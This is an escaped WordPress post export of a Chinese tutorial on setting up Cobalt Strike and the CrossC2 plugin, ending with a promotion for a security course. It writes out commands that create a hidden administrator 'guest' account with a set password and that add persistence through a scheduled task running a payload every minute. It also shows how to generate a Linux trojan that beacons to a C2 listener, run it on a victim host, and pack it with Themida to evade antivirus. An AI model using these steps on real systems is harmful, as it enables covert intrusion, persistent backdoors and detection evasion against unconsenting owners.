\/add&#xff1a;\u8fd9\u4e2a\u547d\u4ee4\u9996\u5148\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u540d\u4e3a&#034;guest&#034;\u7684\u7528\u6237&#xff0c;\u5bc6\u7801\u4e3a&#034;Admin&#064;hacker&#034;\u3002\u5982\u679c\u8fd9\u4e00\u6b65\u6210\u529f&#xff0c;\u63a5\u7740\u5c06\u8fd9\u4e2a&#034;guest&#034;\u7528\u6237\u6dfb\u52a0\u5230\u672c\u5730\u7ba1\u7406\u5458\u7ec4\u4e2d&#xff0c;\u4f7f\u5176\u5177\u6709\u7ba1\u7406\u5458\u6743\u9650\u3002\u4f46\u9700\u8981\u6ce8\u610f\u7684\u662f&#xff0c;\u9ed8\u8ba4\u60c5\u51b5\u4e0b&#xff0c;Windows\u7cfb\u7edf\u4e0d\u5141\u8bb8\u5c06Guest\u7528\u6237\u6dfb\u52a0\u5230\u7ba1\u7406\u5458\u7ec4\u4e2d&#xff0c;\u56e0\u6b64\u8fd9\u4e2a\u547d\u4ee4\u53ef\u80fd\u5728\u6807\u51c6\u8bbe\u7f6e\u4e0b\u65e0\u6cd5\u6210\u529f\u6267\u884c\u3002<\/p>\n<\/li>\n<li>\n<p>net user guest \/active:yes&#xff1a;\u8fd9\u4e2a\u547d\u4ee4\u5c1d\u8bd5\u6fc0\u6d3b\u540d\u4e3a&#034;guest&#034;\u7684\u7528\u6237\u8d26\u6237&#xff0c;\u4f7f\u5176\u5904\u4e8e\u6fc0\u6d3b\u72b6\u6001&#xff0c;\u53ef\u4ee5\u767b\u5f55\u7cfb\u7edf\u4f7f\u7528\u3002<\/p>\n<\/li>\n<p>\u9700\u8981\u7279\u522b\u6ce8\u610f\u7684\u662f&#xff0c;\u5bf9\u7cfb\u7edf\u9ed8\u8ba4\u7684Guest\u7528\u6237\u8fdb\u884c\u8fd9\u6837\u7684\u64cd\u4f5c\u53ef\u80fd\u4f1a\u5e26\u6765\u4e25\u91cd\u7684\u5b89\u5168\u98ce\u9669&#xff0c;\u56e0\u4e3aGuest\u8d26\u6237\u901a\u5e38\u5177\u6709\u8f83\u4f4e\u7684\u6743\u9650&#xff0c;\u5e76\u4e14\u53ef\u80fd\u88ab\u9ed1\u5ba2\u7528\u6765\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n<h6>7&#xff09;\u8ba1\u5212\u4efb\u52a1<\/h6>\n<p>schtasks \/create \/sc MINUTE \/mo 1 \/tn test \/tr &#034;C:\\\\Users\\\\Administrator\\\\Desktop\\\\mx\\\\5555.exe&#034;<\/p>\n<p>\u8fd9\u4e2a\u547d\u4ee4\u5c06\u4f1a\u521b\u5efa\u4e00\u4e2a\u540d\u4e3a&#034;test&#034;\u7684\u8ba1\u5212\u4efb\u52a1&#xff0c;\u6307\u5b9a\u4e86\u6bcf\u9694\u4e00\u5206\u949f\u6267\u884c\u4e00\u6b21&#xff0c;\u5e76\u4e14\u8981\u8fd0\u884c\u7684\u7a0b\u5e8f\u662f&#034;C:\\\\Users\\\\Administrator\\\\Desktop\\\\mx\\\\5555.exe&#034;\u3002<\/p>\n<h5>\u4e03\u3001linux \u501f\u52a9 CrossC \u4e0a\u7ebf &#xff08;linux \u7cfb\u7edf\u4e0a\u7ebf\u6211\u4eec\u7684\u6728\u9a6c&#xff09;<\/h5>\n<p>\u6211\u8fd9\u91cc\u53c8\u5b89\u88c5\u4e86cs3.14\u53c8\u56e0\u4e3acs\u7684\u7248\u672c\u8981\u4e0eCrossC2\u76f8\u5bf9\u5e94\u624d\u884c&#xff0c;\u641e\u4e86\u4e00\u5929\u624d\u53d1\u73b0\u8fd9\u4e2a\u95ee\u9898&#xff0c;CS3.14 &lt;\u2014\u2014&gt;CrossC2 -v2.1\u7248\u672c&#xff0c;\u5176\u4ed6\u7248\u672c\u7684\u5bf9\u5e94\u5173\u7cfb\u53ef\u4ee5\u81ea\u5df1\u5c1d\u8bd5<\/p>\n<h6>1&#xff09;\u5f00\u542fcs3.14\u670d\u52a1\u7aef\u4e0e\u5ba2\u6237\u7aef &#xff08;\u4f7f\u7528\u65b9\u5f0f\u4e0e\u4e0a\u9762\u4ecb\u7ecd\u7684CS4.0\u662f\u4e00\u6837\u7684&#xff09;<\/h6>\n<p># \u542f\u52a8\u670d\u52a1\u7aef<br \/>\n.\/teamserver 192.168.1.3 root <\/p>\n<p><img decoding=\"async\" src=\"2026-02-051lzgeq2cslg.png\" alt=\"\" \/><\/p>\n<p># \u542f\u52a8\u5ba2\u6237\u7aef<br \/>\njava -Dfile.encoding&#061;UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads&#061;4 -XX:&#043;AggressiveHeap -XX:&#043;UseParallelGC -jar cobaltstrike.jar<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05timza1gtgot.png\" alt=\"\" \/><\/p>\n<h6>2&#xff09;\u4e0b\u8f7dlinux\u63d2\u4ef6CrossC2-v2.1<\/h6>\n<p>\u6253\u5f00Github&#xff1a;GitHub &#8211; gloxec\/CrossC2: generate CobaltStrike\u2019s cross-platform payload<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05105nyizf51w.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-054hip5wq3zfd.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05ggm2j3vqqyo.png\" alt=\"\" \/><\/p>\n<h6>3&#xff09;\u751f\u6210linux\u6728\u9a6c<\/h6>\n<p>\u65b9\u5f0f\u4e00&#xff1a;\u811a\u672c\u7684\u65b9\u5f0f\u751f\u6210 &#xff08;genCrossC2.Linux&#xff09;<\/p>\n<p># \u8fd0\u884c\u811a\u672cgenCrossC2.Linux                       \u7cfb\u7edf\u7c7b\u578b\u3001\u751f\u6210\u7684\u6587\u4ef6\u540d&#xff08;\u8fd9\u91cc\u4e5f\u53ef\u4ee5\u5199\u6587\u4ef6\u8def\u5f84&#xff0c;\u751f\u6210\u5230\u6307\u5b9a\u7684\u6587\u4ef6\u8def\u5f84\u5982&#xff1a;tmp\\\\c2&#xff09;<br \/>\n.\/genCrossC2.Linux \u76d1\u542c\u5668ip \u76d1\u542c\u5668\u7aef\u53e3 null null Linux x64 C2<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05btpdwtx5en2.png\" alt=\"\" \/><\/p>\n<p>\u65b9\u5f0f\u4e8c&#xff1a;<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05bis4x21hhjr.png\" alt=\"\" \/><\/p>\n<p>\u6309\u9053\u7406\u6765\u8bf4\u4f1a\u6709\u4e2a\u5f39\u6846&#xff0c;\u5f39\u6846\u5185\u4f1a\u6709\u4e2a\u4e0b\u8f7d\u94fe\u63a5\u4f46\u662f\u6211\u8fd9\u91cc\u6ca1\u6709\u53cd\u5e94&#xff08;\u6211\u4e4b\u524d\u75283.1\u7248\u672c\u7684\u63d2\u4ef6\u5c31\u5c31\u662f\u8fd9\u6837&#xff09;&#xff0c;\u5e94\u8be5\u662fcs\u4e0e\u63d2\u4ef6\u7684\u7248\u672c\u4e0d\u662f\u5f88\u5339\u914d&#xff0c;\u4e0d\u7ba1\u4e86\u6709\u4e00\u79cd\u65b9\u5f0f\u751f\u6210\u6728\u9a6c\u8f85\u52a9\u6211\u4eec\u5b66\u4e60\u5c31\u597d&#xff0c;\u6bd5\u7adf\u6211\u4eec\u4e0d\u662f\u8981\u505a\u8fdd\u6cd5\u7684\u4e8b&#xff0c;\u77e5\u9053\u6709\u8fd9\u79cd\u65b9\u5f0f\u5c31\u597d\u3002<\/p>\n<h6>4&#xff09;\u6709\u4e86\u6728\u9a6c\u4e4b\u540e\u8981\u521b\u5efa\u4e00\u4e2a\u76d1\u542c\u5668&#xff0c;\u8fd9\u4e2a\u63d2\u4ef6\u53ea\u652f\u6301https\u7684\u534f\u8bae&#xff08;windows\/beacon_https\/reverse_https&#xff09;&#xff0c;\u6240\u4ee5\u6211\u4eec\u8981\u521b\u5efahttps\u7684\u76d1\u542c\u5668&#xff0c;\u6ce8\u610f&#xff1a;\u76d1\u542c\u5668\u7684ip\u4e0e\u7aef\u53e3\u8981\u4e0e\u521a\u624d\u7684\u6728\u9a6c\u6587\u4ef6\u76f8\u5bf9\u5e94<\/h6>\n<p><img decoding=\"async\" src=\"2026-02-055mhan0eehby.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05i2ehogssamn.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05dypfeslxdys.png\" alt=\"\" \/><\/p>\n<p>\u53ef\u4ee5\u76f4\u63a5\u5728\u5f53\u524d\u7684\u653b\u51fb\u673a\u8fd0\u884c\u6728\u9a6c\u6d4b\u8bd5\u4e00\u4e0b&#xff08;\u6211\u8fd9\u91cc\u7684cs\u662f\u5b89\u88c5\u7684kali\u4e2d\u7684\u6240\u4ee5\u53ef\u4ee5\u8fd0\u884clinux\u7684\u6728\u9a6c\u6587\u4ef6&#xff09;<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05g2ed4rljopu.png\" alt=\"\" \/><\/p>\n<p>kali\u6210\u529f\u4e0a\u7ebf<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05adjuwcqqtyc.png\" alt=\"\" \/><\/p>\n<h6>5&#xff09;\u628a\u6728\u9a6c\u62ff\u5230\u53d7\u5bb3\u8005\u4e3b\u673a\u8fd0\u884c<\/h6>\n<p># \u8d4b\u4e88\u6267\u884c\u6743\u9650<br \/>\nchmod &#043;x \u6728\u9a6c\u6587\u4ef6\u540d<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05ur0fy3jxuis.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05ytujoel4z14.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05fmgskhgf0do.png\" alt=\"\" \/><\/p>\n<h6>\u6740\u6bd2\u8f6f\u4ef6\u4f1a\u67e5\u6740\u6211\u4eec\u7684<img decoding=\"async\" src=\"2026-02-05qgqdr3lfql5.png\" alt=\"\" \/>\u600e\u4e48\u529e&#xff1f;\u4e00\u62db\u6559\u4f60\u8eb2\u907f\u706b\u7ed2\u7684\u63a2\u6d4b<\/h6>\n<p>\u52a0\u58f3&#xff1a;\u538b\u7f29\u58f3\u3001\u52a0\u5bc6\u58f3<\/p>\n<p>\u5982&#xff1a;Themida****<\/p>\n<p>\u4f7f\u7528\u793a\u4f8b&#xff1a;<\/p>\n<p>    \u6253\u5f00\u8f6f\u4ef6 <\/p>\n<p><img decoding=\"async\" src=\"2026-02-053r0akvxuqmp.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05dk0azgt1laz.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-051tc3v32cvyu.png\" alt=\"\" \/><\/p>\n<p>\u7136\u540e\u8010\u5fc3\u7b49\u5f85\u52a0\u5bc6\u8fc7\u7a0b&#xff0c;\u6700\u540e\u52a0\u5bc6\u6210\u529f\u7684\u754c\u9762\u5982\u4e0b&#xff0c;\u4e4b\u540e\u5c31\u53ef\u4ee5\u5173\u95ed\u8f6f\u4ef6\u4e86\u3002<\/p>\n<p><img decoding=\"async\" src=\"2026-02-050q2yjwsdrfj.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"2026-02-05np5ou4gi5ll.png\" alt=\"\" \/><\/p>\n<p>\u7136\u540e\u53ef\u4ee5\u590d\u5236\u5230\u771f\u5b9e\u673a\u4e0a\u6d4b\u8bd5<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05me15qf0ftzn.png\" alt=\"\" \/><\/p>\n<h3>\u5b66\u4e60\u8d44\u6e90<\/h3>\n<p>\u5982\u679c\u4f60\u662f\u4e5f\u51c6\u5907\u8f6c\u884c\u5b66\u4e60\u7f51\u7edc\u5b89\u5168&#xff08;\u9ed1\u5ba2&#xff09;\u6216\u8005\u6b63\u5728\u5b66\u4e60&#xff0c;\u8fd9\u91cc\u5f00\u6e90\u4e00\u4efd360\u667a\u699c\u6837\u5b66\u4e60\u4e2d\u5fc3\u72ec\u5bb6\u51fa\u54c1\u300a\u7f51\u7edc\u653b\u9632\u77e5\u8bc6\u5e93\u300b,\u5e0c\u671b\u80fd\u591f\u5e2e\u52a9\u5230\u4f60<\/p>\n<p>\u77e5\u8bc6\u5e93\u7531360\u667a\u699c\u6837\u5b66\u4e60\u4e2d\u5fc3\u72ec\u5bb6\u6253\u9020\u51fa\u54c1&#xff0c;\u65e8\u5728\u5e2e\u52a9\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u6216\u5174\u8da3\u7231\u597d\u8005\u96f6\u57fa\u7840\u5feb\u901f\u5165\u95e8\u63d0\u5347\u5b9e\u6218\u80fd\u529b&#xff0c;\u719f\u7ec3\u638c\u63e1\u57fa\u7840\u653b\u9632\u5230\u6df1\u5ea6\u5bf9\u6297\u3002<\/p>\n<h5>1\u3001\u77e5\u8bc6\u5e93\u4ef7\u503c<\/h5>\n<p>\u6df1\u5ea6&#xff1a; \u672c\u77e5\u8bc6\u5e93\u8d85\u8d8a\u5e38\u89c4\u5de5\u5177\u624b\u518c&#xff0c;\u6df1\u5165\u5256\u6790\u653b\u51fb\u6280\u672f\u7684\u5e95\u5c42\u539f\u7406\u4e0e\u9ad8\u7ea7\u9632\u5fa1\u7b56\u7565&#xff0c;\u5e76\u5bf9\u4e1a\u5185\u6311\u6218\u5de8\u5927\u7684APT\u653b\u51fb\u94fe\u5206\u6790\u3001\u9690\u853d\u4fe1\u9053\u5efa\u7acb\u7b49&#xff0c;\u63d0\u4f9b\u4e86\u72ec\u5230\u7684\u6280\u672f\u89c6\u89d2\u548c\u5b9e\u6218\u9a8c\u8bc1\u8fc7\u7684\u5bf9\u6297\u65b9\u6848\u3002<\/p>\n<p>\u5e7f\u5ea6&#xff1a; \u9762\u5411\u4f01\u4e1a\u5b89\u5168\u5efa\u8bbe\u7684\u6838\u5fc3\u573a\u666f&#xff08;\u6e17\u900f\u6d4b\u8bd5\u3001\u7ea2\u84dd\u5bf9\u6297\u3001\u5a01\u80c1\u72e9\u730e\u3001\u5e94\u6025\u54cd\u5e94\u3001\u5b89\u5168\u8fd0\u8425&#xff09;&#xff0c;\u672c\u77e5\u8bc6\u5e93\u8986\u76d6\u4e86\u4ece\u653b\u51fb\u53d1\u8d77\u3001\u8def\u5f84\u7a81\u7834\u3001\u6743\u9650\u7ef4\u6301\u3001\u6a2a\u5411\u79fb\u52a8\u5230\u9632\u5fa1\u68c0\u6d4b\u3001\u54cd\u5e94\u5904\u7f6e\u3001\u6eaf\u6e90\u53cd\u5236\u7684\u5168\u751f\u547d\u5468\u671f\u5173\u952e\u8282\u70b9&#xff0c;\u662f\u5e94\u5bf9\u590d\u6742\u653b\u9632\u6311\u6218\u7684\u5b9e\u7528\u6307\u5357\u3002<\/p>\n<p>\u5b9e\u6218\u6027&#xff1a; \u77e5\u8bc6\u5e93\u5185\u5bb9\u6e90\u4e8e\u771f\u5b9e\u653b\u9632\u5bf9\u6297\u548c\u5927\u578b\u6f14\u7ec3\u5b9e\u8df5&#xff0c;\u901a\u8fc7\u8be6\u5c3d\u7684\u653b\u51fb\u590d\u73b0\u6848\u4f8b\u3001\u9632\u5fa1\u914d\u7f6e\u5b9e\u4f8b\u3001\u81ea\u52a8\u5316\u811a\u672c\u4ee3\u7801\u6765\u4f20\u9012\u6838\u5fc3\u601d\u8def\u4e0e\u843d\u5730\u65b9\u6cd5\u3002<\/p>\n<h5>2\u3001 \u90e8\u5206\u6838\u5fc3\u5185\u5bb9\u5c55\u793a<\/h5>\n<p>360\u667a\u699c\u6837\u5b66\u4e60\u4e2d\u5fc3\u72ec\u5bb6\u300a\u7f51\u7edc\u653b\u9632\u77e5\u8bc6\u5e93\u300b\u91c7\u7528\u7531\u6d45\u5165\u6df1\u3001\u653b\u9632\u7ed3\u5408\u7684\u8bb2\u8ff0\u65b9\u5f0f&#xff0c;\u65e2\u592f\u5b9e\u57fa\u7840\u6280\u80fd&#xff0c;\u66f4\u6df1\u5165\u9ad8\u9636\u5bf9\u6297\u6280\u672f\u3002<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05qjh21ltdhli.png\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>360\u667a\u699c\u6837\u5b66\u4e60\u4e2d\u5fc3\u72ec\u5bb6\u300a\u7f51\u7edc\u653b\u9632\u77e5\u8bc6\u5e93\u300b\u91c7\u7528\u7531\u6d45\u5165\u6df1\u3001\u653b\u9632\u7ed3\u5408\u7684\u8bb2\u8ff0\u65b9\u5f0f&#xff0c;\u65e2\u592f\u5b9e\u57fa\u7840\u6280\u80fd&#xff0c;\u66f4\u6df1\u5165\u9ad8\u9636\u5bf9\u6297\u6280\u672f\u3002<\/p>\n<p>\u5185\u5bb9\u7ec4\u7ec7\u7d27\u5bc6\u7ed3\u5408\u653b\u9632\u573a\u666f&#xff0c;\u8f85\u4ee5\u5927\u91cf\u771f\u5b9e\u73af\u5883\u590d\u73b0\u6848\u4f8b\u3001\u81ea\u52a8\u5316\u5de5\u5177\u811a\u672c\u53ca\u914d\u7f6e\u89e3\u6790\u3002\u901a\u8fc7\u7b56\u7565\u8bb2\u89e3\u3001\u539f\u7406\u5256\u6790\u3001\u5b9e\u6218\u6f14\u793a\u76f8\u7ed3\u5408&#xff0c;\u662f\u4f60\u5b66\u4e60\u8fc7\u7a0b\u4e2d\u597d\u5e2e\u624b\u3002<\/p>\n<p>1\u3001\u7f51\u7edc\u5b89\u5168\u610f\u8bc6<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05r2tzd0ee1xm.png\" alt=\"img\" \/><\/p>\n<p>2\u3001Linux\u64cd\u4f5c\u7cfb\u7edf<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05pimm4xnzobp.png\" alt=\"img\" \/><\/p>\n<p>3\u3001WEB\u67b6\u6784\u57fa\u7840\u4e0eHTTP\u534f\u8bae<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05qql0ohajbor.png\" alt=\"img\" \/><\/p>\n<p>4\u3001Web\u6e17\u900f\u6d4b\u8bd5<\/p>\n<p><img decoding=\"async\" src=\"2026-02-053yyaz1hcrpt.png\" alt=\"img\" \/><\/p>\n<p>5\u3001\u6e17\u900f\u6d4b\u8bd5\u6848\u4f8b\u5206\u4eab<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05m1rkrcyqonu.png\" alt=\"img\" \/><\/p>\n<p>6\u3001\u6e17\u900f\u6d4b\u8bd5\u5b9e\u6218\u6280\u5de7<\/p>\n<p><img decoding=\"async\" src=\"2026-02-0551a1atpetax.png\" alt=\"\u56fe\u7247\" \/><\/p>\n<p>7\u3001\u653b\u9632\u5bf9\u6218\u5b9e\u6218<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05e0jp4txpr4w.png\" alt=\"\u56fe\u7247\" \/><\/p>\n<p>8\u3001CTF\u4e4bMISC\u5b9e\u6218\u8bb2\u89e3<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05rjctfazuy4t.png\" alt=\"\u56fe\u7247\" \/><\/p>\n<h3>3\u3001\u9002\u5408\u5b66\u4e60\u7684\u4eba\u7fa4<\/h3>\n<p>\u200c\u4e00\u3001\u57fa\u7840\u9002\u914d\u4eba\u7fa4\u200c<\/p>\n<li>\u200c\u96f6\u57fa\u7840\u8f6c\u578b\u8005\u200c&#xff1a;\u9002\u5408\u8ba1\u7b97\u673a\u96f6\u57fa\u7840\u4f46\u613f\u610f\u7cfb\u7edf\u5b66\u4e60\u7684\u4eba\u7fa4&#xff0c;\u8d44\u6599\u8986\u76d6\u4ece\u7f51\u7edc\u534f\u8bae\u3001\u64cd\u4f5c\u7cfb\u7edf\u5230\u6e17\u900f\u6d4b\u8bd5\u7684\u5b8c\u6574\u77e5\u8bc6\u94fe\u200c&#xff1b;<\/li>\n<li>\u200c\u5f00\u53d1\/\u8fd0\u7ef4\u4eba\u5458\u200c&#xff1a;\u5177\u5907\u7f16\u7a0b\u6216\u8fd0\u7ef4\u57fa\u7840\u8005\u53ef\u901a\u8fc7\u8d44\u6599\u5feb\u901f\u638c\u63e1\u5b89\u5168\u9632\u62a4\u4e0e\u6f0f\u6d1e\u4fee\u590d\u6280\u80fd&#xff0c;\u5b9e\u73b0\u804c\u4e1a\u65b9\u5411\u62d3\u5c55\u200c\u6216\u8005\u8f6c\u884c\u5c31\u4e1a&#xff1b;<\/li>\n<li>\u200c\u5e94\u5c4a\u6bd5\u4e1a\u751f\u200c&#xff1a;\u8ba1\u7b97\u673a\u76f8\u5173\u4e13\u4e1a\u5b66\u751f\u53ef\u901a\u8fc7\u8d44\u6599\u6784\u5efa\u5b8c\u6574\u7684\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\u4f53\u7cfb&#xff0c;\u7f29\u77ed\u4f01\u4e1a\u7528\u4eba\u9002\u5e94\u671f\u200c&#xff1b;<\/li>\n<p>\u200c\u4e8c\u3001\u80fd\u529b\u63d0\u5347\u9002\u914d\u200c<\/p>\n<p>1\u3001\u200c\u6280\u672f\u7231\u597d\u8005\u200c&#xff1a;\u9002\u5408\u5bf9\u653b\u9632\u6280\u672f\u6709\u5f3a\u70c8\u5174\u8da3&#xff0c;\u5e0c\u671b\u638c\u63e1\u6f0f\u6d1e\u6316\u6398\u3001\u6e17\u900f\u6d4b\u8bd5\u7b49\u5b9e\u6218\u6280\u80fd\u7684\u5b66\u4e60\u8005\u200c&#xff1b;<\/p>\n<p>2\u3001\u5b89\u5168\u4ece\u4e1a\u8005\u200c&#xff1a;\u5e2e\u52a9\u521d\u7ea7\u5b89\u5168\u5de5\u7a0b\u5e08\u7cfb\u7edf\u5316\u63d0\u5347Web\u5b89\u5168\u3001\u9006\u5411\u5de5\u7a0b\u7b49\u4e13\u9879\u80fd\u529b\u200c&#xff1b;<\/p>\n<p>3\u3001\u200c\u5408\u89c4\u9700\u6c42\u8005\u200c&#xff1a;\u5305\u542b\u7b49\u4fdd\u89c4\u8303\u3001\u5b89\u5168\u7b56\u7565\u5236\u5b9a\u7b49\u5185\u5bb9&#xff0c;\u9002\u5408\u9700\u8981\u5e94\u5bf9\u5408\u89c4\u5ba1\u8ba1\u7684\u4f01\u4e1a\u4eba\u5458\u200c&#xff1b;<\/p>\n<p>\u56e0\u7bc7\u5e45\u6709\u9650&#xff0c;\u4ec5\u5c55\u793a\u90e8\u5206\u8d44\u6599&#xff0c;\u5b8c\u6574\u7248\u7684\u7f51\u7edc\u5b89\u5168\u5b66\u4e60\u8d44\u6599\u5df2\u7ecf\u4e0a\u4f20CSDN&#xff0c;\u670b\u53cb\u4eec\u5982\u679c\u9700\u8981\u53ef\u4ee5\u5728\u4e0b\u65b9CSDN\u5b98\u65b9\u8ba4\u8bc1\u4e8c\u7ef4\u7801\u514d\u8d39\u9886\u53d6\u3010\u4fdd\u8bc1100%\u514d\u8d39\u3011<\/p>\n<p><img decoding=\"async\" src=\"2026-02-05cwc52or45js.jpg\" alt=\"img\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u672c\u6587\u4ec5\u7528\u4e8e\u4fe1\u606f\u5b89\u5168\u5b66\u4e60&#xff0c;\u8bf7\u9075\u5b88\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4&#xff0c;\u4e25\u7981\u7528\u4e8e\u975e\u6cd5\u9014\u5f84\u3002\u82e5\u89c2\u4f17\u56e0\u6b64\u4f5c\u51fa\u4efb\u4f55\u5371\u5bb3\u7f51\u7edc\u5b89\u5168\u7684\u884c\u4e3a&#xff0c;\u540e\u679c\u81ea\u8d1f&#xff0c;\u4e0e\u672c\u4eba\u65e0\u5173\u3002<br \/>\n\u4e00\u3001Cobalt Strike\u76f8\u5173\u4ecb\u7ecd<br \/>\n1&#xff09;Cobalt Strike\u662f\u4ec0\u4e48?<br \/>\nCobalt Strike&#xff08;\u7b80\u79f0CS&#xff09;\u662f\u4e00\u6b3e\u4e13\u4e1a\u7684\u56e2\u961f\u4f5c\u6218\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177&#xff0c;\u5305\u542b\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u7aef\u4e24\u4e2a\u90e8\u5206\u3002\u5b83\u7684\u4e3b\u8981\u529f\u80fd\u662f\u5728\u5df2\u7ecf\u53d6\u5f97\u653b\u51fb\u76ee\u6807\u63a7\u5236\u6743\u540e&#xff0c;\u7528<\/p>\n","protected":false},"author":2,"featured_media":72408,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[275,87,61,78,44],"topic":[],"class_list":["post-72428","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","tag-web","tag-87","tag-61","tag-78","tag-44"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/72428.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"\u672c\u6587\u4ec5\u7528\u4e8e\u4fe1\u606f\u5b89\u5168\u5b66\u4e60&#xff0c;\u8bf7\u9075\u5b88\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4&#xff0c;\u4e25\u7981\u7528\u4e8e\u975e\u6cd5\u9014\u5f84\u3002\u82e5\u89c2\u4f17\u56e0\u6b64\u4f5c\u51fa\u4efb\u4f55\u5371\u5bb3\u7f51\u7edc\u5b89\u5168\u7684\u884c\u4e3a&#xff0c;\u540e\u679c\u81ea\u8d1f&#xff0c;\u4e0e\u672c\u4eba\u65e0\u5173\u3002 \u4e00\u3001Cobalt Strike\u76f8\u5173\u4ecb\u7ecd 1&#xff09;Cobalt Strike\u662f\u4ec0\u4e48? Cobalt Strike&#xff08;\u7b80\u79f0CS&#xff09;\u662f\u4e00\u6b3e\u4e13\u4e1a\u7684\u56e2\u961f\u4f5c\u6218\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177&#xff0c;\u5305\u542b\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u7aef\u4e24\u4e2a\u90e8\u5206\u3002\u5b83\u7684\u4e3b\u8981\u529f\u80fd\u662f\u5728\u5df2\u7ecf\u53d6\u5f97\u653b\u51fb\u76ee\u6807\u63a7\u5236\u6743\u540e&#xff0c;\u7528\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/72428.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-05T07:00:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065957-69843fed32dd6.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/72428.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/72428.html\",\"name\":\"\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b - 